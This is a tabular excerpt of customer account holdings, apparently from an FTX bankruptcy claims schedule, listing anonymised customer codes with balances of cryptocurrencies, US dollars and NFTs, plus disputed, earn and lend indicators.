| 07304978 | | BTC[0], USD[0.01] | | |
| 07304979 | | USDT[0.00000139] | | |
| 07304981 | | USD[10.00] | | |
| 07304982 | | USD[10.00] | | |
| 07304983 | | BTC[0], USD[0.00] | | |
| 07304990 | | USD[10.00] | | |
| 07304991 | | USD[10.00] | | |
| 07305003 | | USD[10.00] | | |
| 07305004 | | USD[10.00] | | |
| 07305028 | | DOGE[.766], SOL[0], SUSHI[.472], USD[0.89] | | |
| 07305030 | | ETH[.252728], ETHW[.252728], USD[121.05] | | |
| 07305033 | | USD[10.00] | | |
| 07305034 | | USD[10.00] | | |
| 07305035 | | BTC[0], ETH[0], PAXG[.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07305038 | | USD[10.00] | | |
| 07305039 | | USD[10.00] | | |
| 07305045 | | USD[10.00] | | |
| 07305046 | | USD[10.00] | | |
| 07305049 | | USD[0.00] | | |
| 07305053 | | ETHW[15.05944633], USD[1.11] | | |
| 07305054 | | BAT[.944], BTC[.0000922], DOGE[.9336], GRT[.0492], LINK[.0126], LTC[.000397], TRX[.909], USD[13.72] | | |
| 07305059 | | LINK[.00000001], SOL[0.00531031], USD[0.00], USDT[0.00000127] | | |
| 07305063 | | DOGE[135.864], ETH[.00310529], ETHW[.00310529], USD[0.09], USDT[0.00000095] | | |
| 07305068 | | NFT (318539581298276340/Moving Forward #1)[1], USD[0.00] | | |
| 07305070 | | NFT (549175615034373339/FTX - Off The Grid Miami #2402)[1] | | |
| 07305079 | | BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], LINK[0], SOL[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07305080 | | USD[1.55] | | |
| 07305087 | | BTC[0], ETH[0.00000001], ETHW[0.00000001], MATIC[.34037317], PAXG[0.00001701], SOL[0.00970000], USD[0.00], USDT[0.00019591] | | |
| 07305088 | | BTC[.00000001] | | |
| 07305091 | | BTC[0.00000921], LTC[.00512], USD[0.61] | | |
| 07305097 | | NFT (298575069710340980/FTX - Off The Grid Miami #2747)[1], NFT (482573033902071195/Entrance Voucher #3155)[1], SHIB[2], USD[0.01] | Yes | |
| 07305134 | | USD[10.00] | | |
| 07305137 | | DOGE[.674], USD[3.50] | | |
| 07305138 | | BTC[.00006147] | | |
| 07305149 | | USD[10.00] | | |
| 07305150 | | USD[10.00] | | |
| 07305151 | | USD[0.69] | | |
| 07305153 | Contingent, Disputed | USD[10.00] | | |
| 07305154 | | USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07305155 | | AAVE[0.00483602], DOGE[.01175836], ETH[0], SOL[0], UNI[.00111377], USD[0.01] | | |
| 07305159 | | BTC[0], ETH[0], ETHW[0.00048288], MKR[.00002069], SOL[0], USD[0.00] | | |
| 07305160 | | USD[10.00] | | |
| 07305161 | | USD[10.00] | | |
| 07305162 | | USD[1.06] | | |
| 07305163 | | USDT[3.675987] | | |
| 07305164 | | USD[10.00] | | |
| 07305165 | | USD[10.00] | | |
| 07305173 | | BTC[0.00021895], USD[24999.01] | | |
| 07305174 | | USD[2.98] | | |
| 07305179 | | BTC[0], LTC[0], SOL[0], USD[120.89], USDT[0] | | |
| 07305186 | | ETH[.105459], ETHW[.105459] | | |
| 07305193 | | USD[0.00] | | |
| 07305194 | | DOGE[1], ETHW[.02112143], MATIC[.00039287], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07305201 | | USD[10.00] | | |
| 07305202 | | USD[10.00] | | |
| 07305204 | | SOL[.3196], USD[2604.50] | | |
| 07305205 | | BTC[0], NFT (332337247282495741/Gloom Punk #7173)[1], NFT (347380018686806506/Gloom Punk #4785)[1], NFT (402550443281714101/Belugie #140)[1], NFT (405781643332787868/Gloom Punk #4216)[1], NFT (437080217533031317/Gloom Punk #245)[1], NFT (456602145356580146/Space Bums #6314)[1], NFT (481592147887957495/Space Bums #0938)[1], USD[0.01] | | |
| 07305208 | | USD[10.00] | | |
| 07305210 | | USD[10.00] | | |
| 07305211 | | USD[10.00] | | |
| 07305214 | | USD[10.00] | | |
| 07305215 | | USD[10.00] | | |
| 07305216 | | BTC[.00000001] | | |
| 07305217 | | USD[10.00] | | |
| 07305218 | | USD[500.00] | | |
| 07305220 | | USD[3.04] | | |
| 07305221 | | USD[1.56] | | |
| 07305227 | | BTC[0], ETH[0.00037359], ETHW[0.00037359], USD[3.29], USDT[0] | | |
| 07305228 | | ETHW[0.04620959], NFT (469070942728732619/FTX - Off The Grid Miami #2857)[1], NFT (491473551718654713/Saudi Arabia Ticket Stub #1269)[1], NFT (502960058537722353/Miami Grand Prix 2022 - ID: E8013F2D)[1], USD[0.00], USDT[0] | Yes | |
| 07305230 | | LTC[.02997], USD[1.23] | | |
| 07305238 | | BTC[0.00002791], DOGE[.978], ETH[.000963], ETHW[.000963], NFT (542091274911730644/FTX - Off The Grid Miami #385)[1], SOL[.00936], SUSHI[.2332], USD[2861.46] | | |
| 07305249 | | USD[1.44] | | |
| 07305251 | | USD[0.14], USDT[0] | | |
| 07305254 | | USD[0.00], USDT[0.00000001] | | |
| 07305256 | | BTC[0] | | |
| 07305267 | | BTC[0], USD[0.00], USDT[0] | | |
| 07305295 | | BTC[.00587758], USD[6.03] | | |
| 07305299 | | USD[10.00] | | |
| 07305302 | | ETH[0], ETHW[0], SUSHI[1.15097084], USD[0.00] | | |
| 07305303 | | USD[0.20] | | |
| 07305307 | | USD[0.71] | | |
| 07305309 | | USD[10.00] | | |
| 07305310 | | USD[10.00] | | |
| 07305313 | | NFT (313895299270613733/FTX - Off The Grid Miami #650)[1], USD[1.11] | | |
| 07305315 | | SOL[1998.56949501], USD[238.60] | | |
| 07305316 | | USD[10.00] | | |
| 07305317 | | USD[10.00] | | |
| 07305318 | | USD[10.00] | | |
| 07305319 | | USD[10.00] | | |
| 07305327 | | BTC[0], ETH[0], TRX[0], USD[0.00] | | |
| 07305330 | | SOL[1.52254004], USDT[0.00000122] | | |
| 07305335 | | NFT (303858037480530987/SolDad #2670)[1], NFT (350081350121223210/YOWIE #382)[1], NFT (432218652339423247/SolDad #37)[1], SOL[0], USD[0.00], USDT[0.00014582] | | |
| 07305349 | | USD[0.01], USDT[4.7243058] | | |
| 07305356 | Contingent, Disputed | BTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07305357 | | SOL[0] | | |
| 07305374 | | USD[500.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07305375 | | SOL[2.87712], USD[2.80] | | |
| 07305380 | | BTC[0], USD[0.00] | | |
| 07305386 | | BTC[0], UNI[.013], USDT[3.4609168] | | |
| 07305391 | | USD[0.00] | | |
| 07305396 | | USD[0.03], USDT[0.00996530] | | |
| 07305403 | | BTC[0], USD[0.00], USDT[0.00000002] | | |
| 07305413 | | ETH[.501], ETHW[.501], SOL[1.54641547], USD[59.01] | | |
| 07305414 | | SOL[.00658372], USD[0.00] | | |
| 07305432 | | BTC[0], ETH[0], LINK[0], USD[0.08], USDT[0.00000001], WBTC[0] | | |
| 07305444 | | USD[0.01] | | |
| 07305447 | | USD[0.00] | | |
| 07305453 | | BTC[0.00007946], DOGE[.5], MATIC[.2656322], NFT (30109324940613690/Coachella x FTX Weekend 1 #24011)[1], NFT (30784088309794135/Entrance Voucher #3276)[1], NFT (322432941924177216/Blossom Buddies-Legacy)[1], NFT (32552907191329608/The District-Legacy)[1], NFT (343770491874934363/Cloud Mansion #4 (Redeemed))[1], NFT (350533444543160574/Bahrain Ticket Stub #1839)[1], NFT (368532654706430645/Reflection '07 #68 (Redeemed))[1], NFT (392636227291190733/Bloom City-Legacy)[1], NFT (397170866162164282/Coachella x FTX Weekend 1 #28146)[1], NFT (454971650053872091/The Hill by FTX #6780)[1], NFT (459755810988445057/Reflection '13 #20)[1], NFT (540789019353281603/Let's Grow-Legacy (Redeemed))[1], SOL[.002542], USD[13192.19], USDT[0] | | |
| 07305457 | | BTC[0], XRP[58.27505827] | | |
| 07305469 | | BTC[0], USD[7.89] | | |
| 07305476 | | BTC[.00008818], NFT (350957390449821208/Imola Ticket Stub #435)[1] | | |
| 07305482 | | BTC[0.06126644], DOGE[9573.56589163], ETH[.00024825], ETHW[.00024825], USD[3.78] | | |
| 07305490 | | NFT (443657716511712099/FTX Crypto Cup 2022 Key #2941)[1] | | |
| 07305495 | | USD[0.00] | | |
| 07305507 | | TRX[37.703321], USD[857.32], USDT[21.234779] | | |
| 07305510 | | TRX[.458201], USD[0.30] | | |
| 07305517 | | BF_POINT[100], BTC[0], ETHW[9.46546005], NFT (357391801451793325/Entrance Voucher #3542)[1], NFT (404255769468475016/FTX - Off The Grid Miami #313)[1], USD[441.70], USDT[0] | Yes | |
| 07305518 | | USD[4.50] | | |
| 07305527 | | USD[10.00] | | |
| 07305528 | | USD[10.00] | | |
| 07305531 | | USD[0.00] | | |
| 07305538 | | AAVE[.00195], ETH[.000291], ETHW[.941291], SOL[.0079444], UNI[.087], USD[0.00], USDT[0] | | |
| 07305543 | | BTC[.29955753], USD[1.24] | | |
| 07305544 | | USD[1.00] | | |
| 07305546 | | ETH[.00095287], ETHW[.00095287], NFT (403954940755304179/Martizen #5724)[1], NFT (433071822846715715/Martizen #5697)[1], NFT (449752286117249866/Martizen #6689)[1], SOL[.00529351], USD[2.46], USDT[0] | | |
| 07305550 | | USD[10.00] | | |
| 07305551 | | USD[10.00] | | |
| 07305552 | | BTC[0], NFT (329710424677157562/Humpty Dumpty #1373)[1], USD[6.98] | | |
| 07305562 | | BTC[.00007447], SOL[.00867866], USD[2044.30] | | |
| 07305564 | | SOL[0], USD[10.82] | | |
| 07305568 | | BTC[0], USD[0.00], USDT[0.00005638] | | |
| 07305570 | | AAVE[.00000001], AVAX[0], BTC[0], ETH[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07305572 | | BTC[0], USD[3.23] | | |
| 07305573 | | BAT[6.17632142], BRZ[3], BTC[0], DOGE[6], GRT[4], LINK[.00289383], MATIC[.10215968], SHIB[6], SOL[.77193716], TRX[10], USD[0.00], USDT[2.04885274] | Yes | |
| 07305574 | | BTC[0], SHIB[0], USD[2.66] | | |
| 07305577 | | USD[0.00] | | |
| 07305579 | | BTC[0.00000931], DOGE[.5284], ETH[.0002324], ETHW[.0002324], SOL[.06592], USD[0.35] | | |
| 07305580 | | USD[10.00] | | |
| 07305584 | | ETH[0.00100000], ETHW[0.02700000], USD[0.08] | | |
| 07305597 | | ETHW[.09877428], SUSHI[.18054891], TRX[.000001] | | |
| 07305603 | | BCH[.00005835], DOGE[11.56895], LINK[.06219], SOL[0], USD[0.00] | | |
| 07305608 | | USD[10.00] | | |
| 07305609 | Contingent, Disputed | BTC[.00008246], USD[0.03] | | |
| 07305615 | | AVAX[14.99], BTC[0.00000217], DOGE[221], NFT (295001164507630972/Entrance Voucher #2756)[1], SOL[0], USD[0.08] | | |
| 07305620 | | BTC[0], ETHW[.090215], LINK[.6951], SOL[0.01126463], TRX[194], USD[0.00], USDT[0] | | |
| 07305631 | | GRT[1268.630431], LINK[12.5496], TRX[.000001], USD[0.00], USDT[0] | | |
| 07305636 | | NFT (538647319502809493/FTX Crypto Cup 2022 Key #3369)[1] | | |
| 07305645 | | AVAX[0], BTC[0], DOGE[0], ETH[0.00066874], ETHW[0.00066874], NFT (385963306677637792/FTX - Off The Grid Miami #1184)[1], SOL[0.69131501], TRX[.000001], USD[0.74], USDT[0.98220647] | | |
| 07305647 | | USD[2.00] | | |
| 07305653 | | USD[1.38] | | |
| 07305655 | | BTC[0], USD[0.00], USDT[0.00027931] | | |
| 07305662 | | BTC[0.00005711], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07305664 | | SOL[0] | | |
| 07305667 | | LINK[.0508], SOL[.003306], USD[12601.82], USDT[9724.93289869] | | |
| 07305673 | | ETH[0], ETHW[0.04115247], NFT (32281387650235455/Squiggly line #1)[1], NFT (42287957392037939/Humpty Dumpty #265)[1], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07305677 | | BTC[0], SHIB[400000], USD[0.95] | | |
| 07305679 | | BTC[.04] | | |
| 07305682 | | BCH[0], BTC[0.00004538], ETH[.00016704], ETHW[0.00016703], USD[0.01], USDT[0] | | |
| 07305689 | | USD[5.00] | | |
| 07305695 | | BTC[0], ETHW[0.07555903], USD[0.00] | | |
| 07305696 | | USD[0.98] | | |
| 07305697 | Contingent, Disputed | BTC[0], ETH[0], LTC[0], SOL[0], UNI[0], USD[0.00] | | |
| 07305706 | | BTC[0.00001547], PAXG[0], SOL[0], USD[0.00], USDT[0.00000127] | | |
| 07305710 | | USD[1.88] | | |
| 07305712 | | USD[0.00] | | |
| 07305722 | | BTC[.3117499], LINK[768.483], SOL[152.85551], TRX[.000004], USD[1.97], USDT[1283.8019854] | | |
| 07305724 | | BTC[0], DAI[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.78], USDT[0] | | |
| 07305726 | | USD[0.00] | | |
| 07305736 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07305739 | | AAVE[0], AVAX[0], BCH[0], BTC[0.00000002], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[0.00000001], NFT (324688223266014557/MagicEden Vaults)[1], NFT (389013572021590381/MagicEden Vaults)[1], NFT (466342209866843063/MagicEden Vaults)[1], NFT (495514403185407806/MagicEden Vaults)[1], NFT (516542128391534234/SMB #4372)[1], NFT (518831479471976409/MagicEden Vaults)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07305755 | | USD[10.00] | | |
| 07305756 | | USD[10.00] | | |
| 07305757 | | USD[10.00] | | |
| 07305758 | | USD[10.00] | | |
| 07305759 | | USD[0.02] | | |
| 07305760 | | USD[0.00] | | |
| 07305770 | | BTC[85.39422875], PAXG[1.58271909], SOL[.047848], USD[17.51] | | |
| 07305771 | | USD[10.00] | | |
| 07305772 | | USD[10.00] | | |
| 07305781 | | USD[1.30] | | |
| 07305782 | | USD[888.00] | | |
| 07305783 | | SOL[1.55], USD[55.71] | | |
| 07305791 | | ETH[0], LTC[0], USD[0.00] | | |
| 07305797 | | BTC[.00208236], SOL[99.6] | | |
| 07305799 | | USD[7.25] | | |
| 07305811 | | BTC[0], NFT (361261901726665122/Sisterverse #1514)[1], NFT (400285810914102172/SolSister #06348)[1], USD[0.00] | | |
| 07305816 | | BTC[0], DOGE[0], ETH[0], ETHW[0], MATIC[0], SOL[0], USD[25000.45] | | |
| 07305818 | | USD[2.80], USDT[2.9744] | | |
| 07305821 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07305822 | | BTC[0], ETHW[.000933], USD[2156798.83] | | |
| 07305826 | | DOGE[50.21808165], USD[0.01] | | |
| 07305834 | | SOL[.00000001], USD[0.88], USDT[0] | | |
| 07305843 | | ETH[.00089958], ETHW[0.00089958], USD[1.14] | | |
| 07305854 | | BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07305860 | | GRT[.99], SHIB[399600], USD[1.99], USDT[0.00077295] | | |
| 07305863 | | BCH[.00035], BTC[0.00003183], DOGE[946.745], ETH[.00068], ETHW[.00068], SOL[0.00083751], USD[0.01], USDT[0.00630174] | | |
| 07305875 | | BTC[0], ETHW[10.211779], SOL[0], USD[0.01] | | |
| 07305876 | | LINK[.0217], SOL[27.29091900], USD[-0.22], USDT[.00161291] | | |
| 07305878 | | BTC[0.00432450], USD[1.68] | | |
| 07305880 | | BTC[.01238369], SOL[2.62175587] | | |
| 07305888 | | USD[0.00] | | |
| 07305891 | | DOGE[.715], MATIC[.764], USD[0.00] | | |
| 07305892 | | DAI[0], LTC[0], NFT (309644484285561363/Sigma Shark #2177)[1], NFT (32806907171092427/Sigma Shark #5271)[1], NFT (425499688051074403/Sigma Shark #5076)[1], NFT (508877497548497747/Sigma Shark #2255)[1], SOL[0], USD[3.43], USDT[0] | | |
| 07305895 | | ETH[0], NFT (407999300569917658/Hopeless Romantic)[1], SOL[2.00888029], USD[0.03] | | |
| 07305898 | | SOL[.9974], USD[3.42] | | |
| 07305900 | | ETH[.00000001], SOL[0], USD[20.09] | | |
| 07305904 | | USD[0.00] | | |
| 07305909 | | USD[1.93] | | |
| 07305912 | | BTC[.0000678], LINK[.098], USD[0.09], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07305935 | | BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000185] | | |
| 07305938 | | NFT (425081276451942005/Helios 3D)[1], NFT (494464020322679977/Helios 3D)[1], USD[1.34] | | |
| 07305939 | | BTC[.00007065], USD[1.74] | | |
| 07305941 | | USD[9.02], USDT[5] | | |
| 07305955 | | ALGO[5313.17712164], ETH[.00994817], ETHW[.00994817], USD[0.11] | | |
| 07305957 | | BTC[.0000045], DOGE[.95765], ETHW[.6400224], USD[0.97] | | |
| 07305964 | | USD[10.00] | | |
| 07305966 | | USD[10.00] | | |
| 07305967 | | USD[10.00] | | |
| 07305968 | | USD[10.00] | | |
| 07305969 | | USD[10.00] | | |
| 07305970 | | USD[10.00] | | |
| 07305971 | | USD[10.00] | | |
| 07305981 | | NFT (488509253279668803/Coachella x FTX Weekend 1 #20170)[1] | | |
| 07305988 | | BTC[0.00005042], ETHW[0.27705700], GRT[.585], NFT (473837695096473623/Entrance Voucher #4310)[1], SOL[0.00119000], USD[1881.81], WBTC[.00001378] | | |
| 07305992 | | SOL[.00668197], SUSHI[0.02950232], USD[0.00], USDT[0.00000010] | | |
| 07305994 | | BCH[.00023909], ETH[.00032199], ETHW[.00032199], USD[0.00] | | |
| 07305996 | | BTC[0.00000710], ETH[.00000001], ETHW[0], USD[1.42] | | |
| 07306006 | | ALGO[.36460275], BRZ[1], DOGE[.03314892], SHIB[41313.74330432], USD[0.39] | Yes | |
| 07306008 | | ETH[.006604], ETHW[.006604], LTC[.47808], USD[0.41], USDT[1.58841104] | | |
| 07306010 | | BTC[0], ETH[0], PAXG[0], SUSHI[0], USD[12.07] | | |
| 07306012 | | BCH[.00003397] | | |
| 07306015 | | USD[7.50] | | |
| 07306016 | | DOGE[1], USD[0.00] | | |
| 07306023 | | USD[0.60] | | |
| 07306024 | Contingent, Disputed | LTC[.00452635], USD[0.07] | | |
| 07306034 | | DOGE[57.768], USD[0.03] | | |
| 07306046 | | BTC[0.00208600], SOL[0], USD[0.00] | | |
| 07306047 | | BTC[0.00000817] | | |
| 07306052 | | BTC[0.00003451], USD[0.00], USDT[0] | | |
| 07306056 | | LTC[0], NFT (570976055747900042/Referral NFT)[1], SOL[0] | | |
| 07306070 | | USD[0.00] | | |
| 07306082 | | USD[100.00] | | |
| 07306088 | | ETHW[.24975], TRX[.000019], USD[0.00], USDT[0] | | |
| 07306090 | | BRZ[3], BTC[.00005069], CUSDT[6], DOGE[.73167416], ETHW[.00065], SHIB[1], SUSHI[.40554698], TRX[2.011174], USD[38.16], USDT[.005804] | Yes | |
| 07306093 | | NFT (487856837682129725/Warriors 75th Anniversary City Edition Diamond #1158)[1] | | |
| 07306097 | | USD[5.00] | | |
| 07306100 | | USD[10.00] | | |
| 07306104 | | DOGE[.212], ETH[.00000001], ETHW[0], SOL[.11199856], TRX[.688], USD[0.00] | | |
| 07306107 | | ETH[0], SOL[0], USD[3.91] | | |
| 07306119 | | BTC[0], NFT (315389110248420960/Art or Science)[1], NFT (490584661022810323/Art or Science #3)[1], NFT (561565733193411174/Art or Science #2)[1], SOL[.08], USD[39.56] | | |
| 07306123 | | BTC[0], ETH[.00000001], TRX[.000001], USD[0.94], USDT[0] | | |
| 07306124 | | BTC[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[.00002], UNI[0], USD[0.58], USDT[0.00000001], WBTC[0], YFI[0] | | |
| 07306126 | Contingent, Disputed | USD[0.00] | | |
| 07306130 | | USD[2252.40] | | |
| 07306137 | | BAT[0], ETH[.00007244], ETHW[.00007243], SOL[0], USD[0.41], USDT[.1717752] | | |
| 07306144 | | USDT[.000128] | | |
| 07306145 | | DOGE[.779], ETH[.000408], ETHW[.000408], USD[4.72], YFI[.00073] | | |
| 07306152 | | TRX[.074365], USD[0.02], USDT[0.00528850] | | |
| 07306154 | | BTC[.0000057], USD[0.25] | | |
| 07306159 | | SOL[0], USD[0.50] | | |
| 07306168 | | ETHW[.00051119] | | |
| 07306170 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07306177 | | ETH[0.00000001], ETHW[0], USD[0.00] | | |
| 07306181 | | SUSHI[.452], USD[0.13] | | |
| 07306184 | | NFT (426618509913786871/Coachella x FTX Weekend 2 #7888)[1] | | |
| 07306206 | | NFT (559024662482418439/The Eagle Nebula)[1], SOL[.11] | | |
| 07306208 | | BTC[0.00008907], SOL[.00000001], SUSHI[.1685], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07306225 | | BCH[0], BTC[0], ETH[0.00005174], ETHW[0.00014602], NFT (421276802482382262/Hall of Fantasy League #138)[1], NFT (551165269443032269/Cumulative Loss)[1], USD[0.05] | | |
| 07306228 | | USDT[.19066] | | |
| 07306230 | | USD[0.00] | | |
| 07306231 | | ETH[5.14369200], ETHW[5.14369200], USD[21143.34] | | |
| 07306238 | | USD[0.36] | | |
| 07306242 | | BF_POINT[300], NFT (396714025027165760/Romeo #443)[1], NFT (544727519966756533/Humpty Dumpty #520)[1], USD[111036.48] | | USD[109780.75] |
| 07306244 | | AAVE[0], ALGO[0], BTC[0], DOGE[0], ETH[0.20006069], LINK[0], NFT (565060862636091855/Solana Islands #1704)[1], SOL[0], SUSHI[0], TRX[0], USD[0.16], USDT[0] | | |
| 07306245 | | BTC[3.00013334], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], USD[16452.89], USDT[0] | | |
| 07306254 | | USD[0.03] | | |
| 07306260 | | USD[4.12] | | |
| 07306264 | | LTC[.00025692], USDT[.0030225] | | |
| 07306269 | | DOGE[0], USD[0.07] | | |
| 07306282 | | BTC[0], USD[0.00] | | |
| 07306283 | | SOL[0], USD[3.33], USDT[0.00000145] | | |
| 07306287 | | BTC[.0000234], ETH[.000974], ETHW[.000974], LINK[.0004], USD[1.70] | | |
| 07306295 | | DOGE[.244], GRT[.728], UNI[.097], USD[1.46] | | |
| 07306296 | | ETHW[12.537], USD[0.00], USDT[0] | | |
| 07306302 | | BTC[0.00001296], DOGE[350], SUSHI[11.983] | | |
| 07306305 | | DOGE[.00358955], TRX[.140427], USD[0.00], USDT[0.00000001] | | |
| 07306312 | | BTC[2.90997016], ETH[.344515], ETHW[.000515], SOL[756.42950823], UNI[1137.8304], USD[856.04] | | |
| 07306313 | | BTC[0.00145947], SOL[0], TRX[27.972], USD[0.04] | | |
| 07306314 | | BTC[0] | | |
| 07306316 | | BTC[0.00003106], ETH[.0008974], ETHW[.1078974], USD[0.01] | | |
| 07306321 | | USD[0.00] | | |
| 07306323 | | BTC[.000068], LINK[.0436], LTC[.00228], USD[32.10], YFI[.008964] | | |
| 07306325 | | BTC[0.04737226], DOGE[559.44000000], ETH[0.30414748], ETHW[0.30414748], LINK[1.02174], LTC[1.00023627], SHIB[55353.18631303], SOL[1.0000168], SUSHI[1.00279869], TRX[19.99995485], UNI[1.00179911], USD[0.00], USDT[0], YFI[.00153106] | | |
| 07306326 | | BTC[0], USDT[0.00014815] | | |
| 07306337 | | BTC[0.00003223], SOL[0], TRX[.655], USD[1.03], USDT[.88943997] | | |
| 07306340 | | ETH[.00022341], ETHW[0.00022340], SOL[.00163034], USDT[0] | | |
| 07306341 | | USD[1.40], USDT[0] | | |
| 07306342 | | DOGE[.925], SUSHI[.128], USD[49.48] | | |
| 07306345 | | USD[0.00], USDT[.20403168] | | |
| 07306348 | | BTC[0.00009040], ETH[.000921], ETHW[.000921], SUSHI[9.96], USD[2.05] | | |
| 07306353 | | BTC[0], ETH[.0004], ETHW[.0004], USD[0.20] | | |
| 07306375 | | USD[4.01] | | |
| 07306376 | | USD[0.01], USDT[.00459712] | | |
| 07306379 | | BTC[0], ETH[.00000001], ETHW[0], SUSHI[0], UNI[0], USD[1.71], USDT[0] | | |
| 07306390 | | BTC[0.00000001], USD[0.00] | | |
| 07306393 | | AVAX[42.2], BTC[0.89119271], DOGE[.586], ETH[.071827], ETHW[.071827], LINK[.075], SOL[0.05122767], SUSHI[.3044], TRX[.52], USD[0.71], USDT[0.84276232] | | |
| 07306406 | | DOGE[0], ETH[0], LINK[.045], LTC[.002], SUSHI[3.5], USD[0.01], WBTC[0] | | |
| 07306407 | | USD[0.78] | Yes | |
| 07306408 | | NFT (310521683841746701/Bitcoin White Paper #2)[1], NFT (333165838991543856/Humpty Dumpty #525)[1], NFT (383136265450014591/Bitcoin White Paper #3)[1], NFT (403804340559524989/Bitcoin White Paper #7)[1], NFT (451324211679881207/Bitcoin White Paper #9)[1], NFT (454300551186981861/Bitcoin White Paper #6)[1], NFT (454820219604363889/Bitcoin White Paper #5)[1], NFT (456053386015408565/Bitcoin White Paper #8)[1], NFT (512268059932600150/Bitcoin White Paper #1)[1], NFT (521984651081327191/Bitcoin White Paper #4)[1], USD[7.81] | | |
| 07306409 | | CUSDT[35075.65980107], TRX[.011287], USD[21.80], USDT[10100.7070881] | Yes | |
| 07306411 | | DOGE[.79134], ETH[0], USD[0.00] | | |
| 07306413 | | BTC[0], USD[0.00] | | |
| 07306420 | | NFT (385705137322075673/Poo #1)[1], USD[3.09] | | |
| 07306423 | | USD[3.53] | | |
| 07306431 | | BTC[0], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07306442 | | USD[0.00] | | |
| 07306453 | | USD[10.00] | | |
| 07306454 | | USD[10.00] | | |
| 07306460 | | USD[22.00] | | |
| 07306463 | | USD[0.00] | | |
| 07306470 | | BTC[.5023151], NFT (508582264848701236/Funk Sol Brothers)[1], USD[0.00], USDT[1435.32060462] | | |
| 07306472 | | BTC[0], ETH[.00000001], USD[2.08] | | |
| 07306483 | | DOGE[0], MATIC[0], NFT (5533460606078682834/Entrance Voucher #2782)[1], USD[0.00], USDT[0.00000001] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07306484 | | USD[0.21] | | |
| 07306496 | | BCH[.0004902], DOGE[168842.436], GRT[.9745], SOL[.7065], SUSHI[.209], TRX[.83], USD[0.19] | | |
| 07306498 | | DOGE[.108], ETH[.000468], ETHW[.000468], GRT[.70294993], SOL[.08], SUSHI[.216], TRX[.6], USD[5.61] | | |
| 07306502 | | ETH[.33008499], ETHW[.33008499], USD[0.00] | | |
| 07306504 | | BTC[0], ETH[.00026983], ETHW[.00026983], TRX[.011342], USD[4000.00], USDT[0.00000001] | | |
| 07306512 | | USD[0.00] | | |
| 07306532 | | USD[0.00], USDT[0] | | |
| 07306535 | | SOL[.024], YFI[.000347] | | |
| 07306544 | | BTC[.0188928], USD[1.42] | | |
| 07306547 | | BF_POINT[300], BTC[.10459329], ETH[.93356925], ETHW[.93356925], USD[627.98] | | |
| 07306549 | | USD[0.68] | | |
| 07306566 | | USD[10.00] | | |
| 07306567 | | USD[10.00] | | |
| 07306585 | | LTC[0], SOL[.02906267], USD[0.00], USDT[0] | | |
| 07306596 | | AAVE[.00000001], AVAX[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], USD[0.07], USDT[0.00000013], WBTC[0.00000001] | | |
| 07306602 | | USD[71.16] | | |
| 07306614 | | USD[3.13] | | |
| 07306618 | | USD[497.00] | | |
| 07306622 | | USDT[0] | | |
| 07306627 | | BTC[0.00003571], ETH[.00000001], SOL[0] | | |
| 07306628 | | MATIC[.00001213], SHIB[3], SOL[.00003169], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07306631 | | BTC[0], USD[0.00], USDT[0] | | |
| 07306636 | | BTC[0], ETH[.001658], ETHW[.001658], LINK[.0924], USD[1.99], USDT[.00469093] | | |
| 07306637 | | USDT[1.2517641] | | |
| 07306638 | | DOGE[11.95200000], USD[0.00] | | |
| 07306639 | | DOGE[700.481], ETH[0], ETHW[0], LINK[16.4745], LTC[3.7962], SOL[.57942], UNI[7.992], USD[0.70] | | |
| 07306642 | | USD[0.00], USDT[0.00000004] | Yes | |
| 07306645 | | GRT[.487], MATIC[8.6], SUSHI[.4935] | | |
| 07306647 | | USD[0.00] | | |
| 07306653 | | USD[0.00], USDT[0] | | |
| 07306656 | Contingent, Disputed | USD[0.01] | | |
| 07306662 | | BTC[.00393211], ETH[.04687863], ETHW[.00147416], USD[849.69], USDT[0] | | |
| 07306673 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07306675 | | USD[1.18] | | |
| 07306678 | | USD[10.00] | | |
| 07306679 | | USD[10.00] | | |
| 07306680 | | USD[10.00] | | |
| 07306681 | | USD[10.00] | | |
